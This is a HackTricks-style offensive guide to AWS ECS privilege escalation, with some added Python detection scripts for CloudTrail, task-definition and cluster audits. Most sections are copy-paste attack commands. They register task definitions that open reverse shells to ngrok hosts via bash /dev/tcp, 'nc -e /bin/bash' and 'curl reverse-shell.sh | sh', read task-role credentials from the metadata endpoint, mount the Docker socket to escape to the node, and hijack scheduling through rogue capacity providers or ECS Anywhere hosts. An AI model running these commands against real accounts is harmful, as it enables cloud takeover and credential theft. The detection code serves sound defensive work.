AWS - ECS Privesc
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the Discord group or the telegram group or follow us on Twitter @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
ECS
More information about ECS in:
iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask
An attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:RunTask permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials and run it.
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"
# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
Potential Impact: Direct privesc to a different ECS role.
iam:PassRole,ecs:RunTask
An attacker with the iam:PassRole and ecs:RunTask permissions can launch a new ECS task and override the execution role, the task role and the container's command values. The ecs run-task CLI command has a --overrides flag that allows changing executionRoleArn, taskRoleArn and the container's command at run time without touching the task definition.
The IAM roles specified as taskRoleArn and executionRoleArn must trust/allow ecs-tasks.amazonaws.com to assume them in their trust policy.
Additionally, the attacker needs to know:
- The ECS cluster name
- The VPC subnet
- The security group (if no security group is specified, the default one is used)
- The task definition name and revision
- The container name
aws ecs run-task \
--cluster <cluster-name> \
--launch-type FARGATE \
--network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" \
--task-definition <task-definition:revision> \
--overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'
In the snippet above the attacker only overrides the value of taskRoleArn. However, for the attack to work the attacker must have the iam:PassRole permission over both the taskRoleArn specified in the command and the executionRoleArn specified in the task definition.
If the IAM role the attacker can pass has enough privileges to pull an ECR image and launch an ECS task (ecr:BatchCheckLayerAvailability, ecr:GetDownloadUrlForLayer, ecr:BatchGetImage, ecr:GetAuthorizationToken), then the attacker can specify that same IAM role for both executionRoleArn and taskRoleArn in the ecs run-task command.
aws ecs run-task --cluster <cluster-name> --launch-type FARGATE --network-configuration "awsvpcConfiguration={subnets=[<subnet-id>],securityGroups=[<security-group-id>],assignPublicIp=ENABLED}" --task-definition <task-definition:revision> --overrides '
{
"taskRoleArn": "arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"executionRoleArn":"arn:aws:iam::<redacted>:role/HighPrivilegedECSTaskRole",
"containerOverrides": [
{
"name": "<container-name>",
"command": ["nc", "4.tcp.eu.ngrok.io", "18798", "-e", "/bin/bash"]
}
]
}'
Potential Impact: Direct privesc to any ECS task role.
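As an added defensive check (not code from the HackTricks page), the following script inspects CloudTrail records for the launch-time abuses of the two RunTask sections above: overrides that swap taskRoleArn/executionRoleArn or replace the container command, and enableExecuteCommand being switched on (the ecs:ExecuteCommand case covered later on this page). The sample events, the account id and the EXPECTED_LAUNCHERS set are constructed.

```python
import json

# Constructed CloudTrail records (sample data, not real events) shaped like
# the ecs.amazonaws.com RunTask/StartTask entries CloudTrail writes.
SAMPLE_EVENTS = [
    {"eventSource": "ecs.amazonaws.com", "eventName": "RunTask",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev-user"},
     "requestParameters": {
         "cluster": "API", "taskDefinition": "web-app:7", "launchType": "FARGATE",
         "overrides": {
             "taskRoleArn": "arn:aws:iam::111111111111:role/HighPrivilegedECSTaskRole",
             "containerOverrides": [{"name": "web",
                                     "command": ["nc", "198.51.100.7", "18798", "-e", "/bin/bash"]}]}}},
    {"eventSource": "ecs.amazonaws.com", "eventName": "RunTask",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:role/deploy-pipeline"},
     "requestParameters": {"cluster": "API", "taskDefinition": "web-app:7",
                           "launchType": "FARGATE", "enableExecuteCommand": False}},
    {"eventSource": "ecs.amazonaws.com", "eventName": "StartTask",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev-user"},
     "requestParameters": {"cluster": "API", "taskDefinition": "batch:3",
                           "enableExecuteCommand": True}},
]

# Assumption: the principals that legitimately launch tasks (CI/CD roles etc.).
EXPECTED_LAUNCHERS = {"arn:aws:iam::111111111111:role/deploy-pipeline"}
LAUNCH_EVENTS = {"RunTask", "StartTask", "CreateService", "UpdateService"}


def analyze_event(event):
    """Return the findings for one CloudTrail record (empty list if benign)."""
    findings = []
    if event.get("eventSource") != "ecs.amazonaws.com" \
            or event.get("eventName") not in LAUNCH_EVENTS:
        return findings
    params = event.get("requestParameters") or {}
    overrides = params.get("overrides") or {}
    # Launch-time role override: the task runs as a role the definition never named.
    for key in ("taskRoleArn", "executionRoleArn"):
        if overrides.get(key):
            findings.append(f"{key} overridden to {overrides[key]}")
    # Command override: the image's intended entrypoint/command is replaced.
    for c in overrides.get("containerOverrides") or []:
        if c.get("command"):
            findings.append(f"command override on container {c.get('name')}: "
                            + " ".join(c["command"]))
    # ECS Exec opened on the task at launch time.
    if params.get("enableExecuteCommand") is True:
        findings.append("enableExecuteCommand=true")
    actor = (event.get("userIdentity") or {}).get("arn", "unknown")
    if findings and actor not in EXPECTED_LAUNCHERS:
        findings.append(f"launched by unexpected principal {actor}")
    return findings


def scan(events):
    """Collect every event that produced findings, together with its actor."""
    report = []
    for ev in events:
        findings = analyze_event(ev)
        if findings:
            report.append({"eventName": ev.get("eventName"),
                           "actor": (ev.get("userIdentity") or {}).get("arn"),
                           "findings": findings})
    return report


if __name__ == "__main__":
    print(json.dumps(scan(SAMPLE_EVENTS), indent=2))
```

In production the same function runs over events pulled from CloudTrail Lake or an S3 trail; a launch with a role override by a principal outside the expected set is the signal to alert on.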
iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask
As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:StartTask permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials and run it.
However, in this case a container instance is needed to run the malicious task definition on.
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"
aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>
# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1
Potential Impact: Direct privesc to any ECS role.
iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)
As in the previous example, an attacker abusing the iam:PassRole, ecs:RegisterTaskDefinition and ecs:UpdateService or ecs:CreateService permissions in ECS can create a new task definition with a malicious container that steals the metadata credentials and run it by creating a new service with at least one task running.
# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512 \
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"
# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"
# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>
Potential Impact: Direct privesc to any ECS role.
iam:PassRole, (ecs:UpdateService|ecs:CreateService)
Actually, with just those permissions it is possible to use overrides to execute arbitrary commands inside a container with any role, with something like:
aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"
Potential Impact: Direct privesc to any ECS role.
ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
This scenario is like the previous ones but without the iam:PassRole permission.
It is still interesting because if you can run an arbitrary container, even without a role, you can run a privileged container to escape to the node and steal the EC2 IAM role together with the roles of the other ECS containers running on the node.
You could even force other tasks to run inside the EC2 instance you compromised in order to steal their credentials (as discussed in the Privesc to node section).
warning
This attack is only possible if the ECS cluster is using EC2 instances and not Fargate.
printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json
printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json
aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2
# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell
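Added example (not part of the original page): a linter for registered task definitions that flags the host bind mount of /var/run/docker.sock shown above, together with the other node-escape settings a reviewer would check (privileged, host network/PID mode, added capabilities). The sample task definition and the sensitive path list are constructed.

```python
import json

# Constructed task definition (sample, not the page's own) registered the way
# the section above describes: a host volume exposing the Docker socket.
SAMPLE_TASK_DEF = {
    "family": "iam_exfiltration",
    "requiresCompatibilities": ["EC2"],
    "volumes": [{"name": "docker-socket",
                 "host": {"sourcePath": "/var/run/docker.sock"}}],
    "containerDefinitions": [{
        "name": "exfil_creds",
        "image": "python:latest",
        "mountPoints": [{"sourceVolume": "docker-socket",
                         "containerPath": "/var/run/docker.sock",
                         "readOnly": False}],
    }],
}

# Host paths that hand a container control of the node or of other tasks.
SENSITIVE_HOST_PATHS = ("/", "/var/run/docker.sock", "/run/docker.sock",
                        "/var/lib/docker", "/proc", "/etc", "/root")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "NET_ADMIN", "SYS_MODULE"}


def _is_sensitive(path):
    """True if the host path is one of the sensitive roots or lies beneath one."""
    norm = path.rstrip("/") or "/"
    return norm in SENSITIVE_HOST_PATHS or any(
        norm.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def lint_task_definition(td):
    """Return human-readable findings for a task definition (empty if clean)."""
    findings = []
    # Map volume name -> host sourcePath; only host bind mounts are of interest.
    host_volumes = {v["name"]: v["host"].get("sourcePath")
                    for v in td.get("volumes", []) if v.get("host")}
    if td.get("networkMode") == "host":
        findings.append("networkMode=host: container shares the node's network namespace")
    if td.get("pidMode") == "host":
        findings.append("pidMode=host: container can see and signal node processes")
    for c in td.get("containerDefinitions", []):
        name = c.get("name", "?")
        if c.get("privileged"):
            findings.append(f"{name}: privileged=true")
        caps = ((c.get("linuxParameters") or {}).get("capabilities") or {}).get("add") or []
        for cap in caps:
            if cap in DANGEROUS_CAPS:
                findings.append(f"{name}: adds capability {cap}")
        for mp in c.get("mountPoints", []):
            src = host_volumes.get(mp.get("sourceVolume"))
            if src is not None and _is_sensitive(src):
                mode = "ro" if mp.get("readOnly") else "rw"
                findings.append(f"{name}: host path {src} mounted {mode} "
                                f"at {mp.get('containerPath')}")
    return findings


if __name__ == "__main__":
    print(json.dumps(lint_task_definition(SAMPLE_TASK_DEF), indent=2))
```

The same function can be run over the output of aws ecs describe-task-definition for every active family, or wired into the CI step that registers new revisions.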
ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)
An attacker with ecs:ExecuteCommand and ecs:DescribeTasks can execute commands inside a running container and exfiltrate the IAM role attached to it (the describe permissions are needed because they are required to run aws ecs execute-command).
However, to do that, the container instance needs to be running the ExecuteCommand agent (which it is not by default).
Therefore, the attacker could try to:
- Try to run a command in every running container
# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo " Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done
# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
- If he has ecs:RunTask, run a task with aws ecs run-task --enable-execute-command [...]
- If he has ecs:StartTask, run a task with aws ecs start-task --enable-execute-command [...]
- If he has ecs:CreateService, create a service with aws ecs create-service --enable-execute-command [...]
- If he has ecs:UpdateService, update a service with aws ecs update-service --enable-execute-command [...]
You can find examples of those options in the previous ECS privesc sections.
Potential Impact: Privesc to a different role attached to the containers.
ssm:StartSession
Check in the ssm privesc page how you can abuse this permission to privesc to ECS:
iam:PassRole, ec2:RunInstances
Check in the ec2 privesc page how you can abuse these permissions to privesc to ECS:
ecs:RegisterContainerInstance, ecs:DeregisterContainerInstance, ecs:StartTask, iam:PassRole
An attacker with these permissions could potentially register an EC2 instance into an ECS cluster and run tasks on it. This could allow the attacker to execute arbitrary code within the context of the ECS tasks.
- TODO: Is it possible to register an instance from a different AWS account so that tasks are run on machines controlled by the attacker?
ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets
note
TODO: Test this
An attacker with the ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet and ecs:DescribeTaskSets permissions can create a malicious task set for an existing ECS service and update the primary task set. This allows the attacker to execute arbitrary code within the service.
# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json
aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json
# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"
# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id
Potential Impact: Execute arbitrary code in the affected service, potentially impacting its functionality or exfiltrating sensitive data.
Hijack ECS Scheduling via Malicious Capacity Provider (EC2 ASG takeover)
An attacker with permissions to manage ECS capacity providers and update services can create an EC2 Auto Scaling Group they control, wrap it in an ECS Capacity Provider, associate it to the target cluster, and migrate a victim service to use this provider. Tasks will then be scheduled onto attacker-controlled EC2 instances, allowing OS-level access to inspect containers and steal task role credentials.
Commands (us-east-1):
- Prerequisites
- Create a Launch Template for the ECS agent to join the target cluster
- Create an Auto Scaling Group
- Create a Capacity Provider from the ASG
- Associate the Capacity Provider to the cluster (optionally as default)
- Migrate a service to your provider
- Verify tasks land on attacker instances
- Optional: From the EC2 node, docker exec into target containers and read http://169.254.170.2 to obtain the task role credentials.
- Cleanup
Potential Impact: Attacker-controlled EC2 nodes receive victim tasks, allowing OS-level access to containers and theft of task IAM role credentials.
Step-by-step commands (copy/paste)
export AWS_DEFAULT_REGION=us-east-1 CLUSTER=arn:aws:ecs:us-east-1:947247140022:cluster/ht-victim-cluster
# Instance profile for ECS nodes
aws iam create-role --role-name ht-ecs-instance-role --assume-role-policy-document Version:2012-10-17 || true
aws iam attach-role-policy --role-name ht-ecs-instance-role --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role || true
aws iam create-instance-profile --instance-profile-name ht-ecs-instance-profile || true
aws iam add-role-to-instance-profile --instance-profile-name ht-ecs-instance-profile --role-name ht-ecs-instance-role || true
VPC=vpc-18e6ac62
SUBNETS=
AMI=ami-0b570770164588ab4
USERDATA=IyEvYmluL2Jhc2gKZWNobyBFQ1NfQ0xVU1RFUj0gPj4gL2V0Yy9lY3MvZWNzLmNvbmZpZwo=
LT_ID=
ASG_ARN=
CP_NAME=htcp-8797
aws ecs create-capacity-provider --name --auto-scaling-group-provider "autoScalingGroupArn=,managedScaling={status=ENABLED,targetCapacity=100},managedTerminationProtection=DISABLED"
aws ecs put-cluster-capacity-providers --cluster "" --capacity-providers --default-capacity-provider-strategy capacityProvider=,weight=1
SVC=
# Task definition must be EC2-compatible (not Fargate-only)
aws ecs update-service --cluster "" --service "" --capacity-provider-strategy capacityProvider=,weight=1 --force-new-deployment
TASK=
CI=
aws ecs describe-container-instances --cluster "" --container-instances "" --query containerInstances[0].ec2InstanceId --output text
Backdooring compute in the cluster via ECS Anywhere EXTERNAL registration
Abuse ECS Anywhere to register an attacker-controlled host as an EXTERNAL container instance in the victim's ECS cluster and run tasks on that host using privileged task and execution roles. This gives OS-level control over where tasks run (your own machine) and allows stealing credentials/data from tasks and attached volumes without touching capacity providers or ASGs.
- Required permissions (minimal example):
  - ecs:CreateCluster (optional), ecs:RegisterTaskDefinition, ecs:StartTask or ecs:RunTask
  - ssm:CreateActivation, ssm:DeregisterManagedInstance, ssm:DeleteActivation
  - iam:CreateRole, iam:AttachRolePolicy, iam:DeleteRole, iam:PassRole (for the ECS Anywhere instance role and task/execution roles)
  - logs:CreateLogGroup/Stream, logs:PutLogEvents (if using awslogs)
- Impact: Run arbitrary containers with a chosen taskRoleArn on the attacker's host; extract task-role credentials from 169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI; gain access to any volumes mounted by the tasks; stealthier than tampering with capacity providers/ASGs.
Steps
- Create or identify the cluster (us-east-1)
aws ecs create-cluster --cluster-name ht-ecs-anywhere
- Create the ECS Anywhere role and an SSM activation (for the on-prem/EXTERNAL instance)
aws iam create-role --role-name ecsAnywhereRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ssm.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/AmazonSSMManagedInstanceCore
aws iam attach-role-policy --role-name ecsAnywhereRole --policy-arn arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role
ACTJSON=$(aws ssm create-activation --iam-role ecsAnywhereRole)
ACT_ID=$(echo $ACTJSON | jq -r .ActivationId); ACT_CODE=$(echo $ACTJSON | jq -r .ActivationCode)
- Prepare the attacker host and auto-register it as EXTERNAL (example: a small AL2 EC2 instance acting as "on-prem")
user-data.sh
#!/bin/bash
set -euxo pipefail
amazon-linux-extras enable docker || true
yum install -y docker curl jq
systemctl enable --now docker
curl -fsSL -o /root/ecs-anywhere-install.sh "https://amazon-ecs-agent.s3.amazonaws.com/ecs-anywhere-install-latest.sh"
chmod +x /root/ecs-anywhere-install.sh
/root/ecs-anywhere-install.sh --cluster ht-ecs-anywhere --activation-id ${ACT_ID} --activation-code ${ACT_CODE} --region us-east-1
AMI=$(aws ssm get-parameters --names /aws/service/ami-amazon-linux-latest/amzn2-ami-hvm-x86_64-gp2 --query 'Parameters[0].Value' --output text)
IID=$(aws ec2 run-instances --image-id $AMI --instance-type t3.micro \
--user-data file://user-data.sh --query 'Instances[0].InstanceId' --output text)
aws ec2 wait instance-status-ok --instance-ids $IID
- Verify that the EXTERNAL container instance joined
aws ecs list-container-instances --cluster ht-ecs-anywhere
aws ecs describe-container-instances --cluster ht-ecs-anywhere \
--container-instances <ci-arn> --query 'containerInstances[0].[ec2InstanceId,attributes]'
# ec2InstanceId will be mi-XXXXXXXX (SSM managed instance id) and attributes include ecs.capability.external
- Create task/execution roles, register an EXTERNAL task definition, and run it on the attacker host
# roles
aws iam create-role --role-name ht-ecs-task-exec \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ht-ecs-task-exec --policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSTaskExecutionRolePolicy
aws iam create-role --role-name ht-ecs-task-role \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs-tasks.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
# attach any privileges you want to abuse to this task role
# task def (EXTERNAL launch)
cat > td-external.json << 'JSON'
{
"family": "ht-external",
"requiresCompatibilities": [ "EXTERNAL" ],
"networkMode": "bridge",
"memory": "256",
"cpu": "128",
"executionRoleArn": "arn:aws:iam::<account-id>:role/ht-ecs-task-exec",
"taskRoleArn": "arn:aws:iam::<account-id>:role/ht-ecs-task-role",
"containerDefinitions": [
{"name":"steal","image":"public.ecr.aws/amazonlinux/amazonlinux:latest",
"entryPoint":["/bin/sh","-c"],
"command":["REL=$(printenv AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); echo CREDS:; curl -s http://169.254.170.2$REL; sleep 600"],
"memory": 128,
"logConfiguration":{"logDriver":"awslogs","options":{"awslogs-region":"us-east-1","awslogs-group":"/ht/ecs/anywhere","awslogs-stream-prefix":"steal"}}
}
]
}
JSON
aws logs create-log-group --log-group-name /ht/ecs/anywhere || true
aws ecs register-task-definition --cli-input-json file://td-external.json
CI=$(aws ecs list-container-instances --cluster ht-ecs-anywhere --query 'containerInstanceArns[0]' --output text)
aws ecs start-task --cluster ht-ecs-anywhere --task-definition ht-external \
--container-instances $CI
- From here you control the host executing the tasks. You can read the task logs (if using awslogs) or exec directly on the host to exfiltrate credentials/data from your tasks.
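Added example (not from the original page) that serves both the capacity-provider hijack and the ECS Anywhere section: it audits describe-container-instances output for EXTERNAL hosts (mi- instance ids or the ecs.capability.external attribute, as noted above) and for EC2 nodes that no known ASG launched, and checks a cluster's capacity providers against an approved set. The sample data, KNOWN_INSTANCE_IDS and APPROVED_CAPACITY_PROVIDERS are constructed assumptions.

```python
import json

# Constructed sample data (not real AWS output) in the shape returned by
# `aws ecs describe-container-instances` and `aws ecs describe-clusters`.
SAMPLE_CONTAINER_INSTANCES = [
    {"containerInstanceArn": "arn:aws:ecs:us-east-1:111111111111:container-instance/prod/aaaa",
     "ec2InstanceId": "i-0123456789abcdef0", "status": "ACTIVE",
     "attributes": [{"name": "ecs.capability.docker-remote-api.1.30"}]},
    # An ECS Anywhere host: ec2InstanceId is an SSM managed-instance id (mi-...)
    {"containerInstanceArn": "arn:aws:ecs:us-east-1:111111111111:container-instance/prod/bbbb",
     "ec2InstanceId": "mi-0abc123def456789a", "status": "ACTIVE",
     "attributes": [{"name": "ecs.capability.external"}]},
    # An EC2 node that none of the account's own Auto Scaling Groups launched
    {"containerInstanceArn": "arn:aws:ecs:us-east-1:111111111111:container-instance/prod/cccc",
     "ec2InstanceId": "i-0fedcba9876543210", "status": "ACTIVE", "attributes": []},
]
SAMPLE_CLUSTER = {
    "clusterName": "prod",
    "capacityProviders": ["prod-asg-cp", "htcp-8797"],
    "defaultCapacityProviderStrategy": [{"capacityProvider": "htcp-8797", "weight": 1}],
}

# Assumptions: instance ids of your own ASGs (e.g. from
# `aws autoscaling describe-auto-scaling-groups`) and the providers you approved.
KNOWN_INSTANCE_IDS = {"i-0123456789abcdef0"}
APPROVED_CAPACITY_PROVIDERS = {"prod-asg-cp", "FARGATE", "FARGATE_SPOT"}


def audit_container_instances(instances, known_ids):
    """Flag EXTERNAL (ECS Anywhere) hosts and EC2 nodes not launched by a known ASG."""
    findings = []
    for ci in instances:
        iid = ci.get("ec2InstanceId", "")
        attrs = {a.get("name") for a in ci.get("attributes", [])}
        if iid.startswith("mi-") or "ecs.capability.external" in attrs:
            findings.append(f"EXTERNAL container instance {iid} registered via ECS Anywhere")
        elif iid not in known_ids:
            findings.append(f"EC2 container instance {iid} not launched by a known ASG")
    return findings


def audit_capacity_providers(cluster, approved):
    """Flag capacity providers (and default strategies) that were never approved."""
    name = cluster.get("clusterName", "?")
    findings = []
    for cp in cluster.get("capacityProviders", []):
        if cp not in approved:
            findings.append(f"unapproved capacity provider {cp} attached to cluster {name}")
    for entry in cluster.get("defaultCapacityProviderStrategy", []):
        cp = entry.get("capacityProvider")
        if cp not in approved:
            findings.append(f"default strategy of {name} places new tasks on unapproved provider {cp}")
    return findings


if __name__ == "__main__":
    report = {
        "container_instances": audit_container_instances(SAMPLE_CONTAINER_INSTANCES, KNOWN_INSTANCE_IDS),
        "capacity_providers": audit_capacity_providers(SAMPLE_CLUSTER, APPROVED_CAPACITY_PROVIDERS),
    }
    print(json.dumps(report, indent=2))
```

Run on a schedule, a non-empty result from either function is the point at which to check CloudTrail for RegisterContainerInstance, CreateCapacityProvider, PutClusterCapacityProviders and ssm CreateActivation calls by unexpected principals.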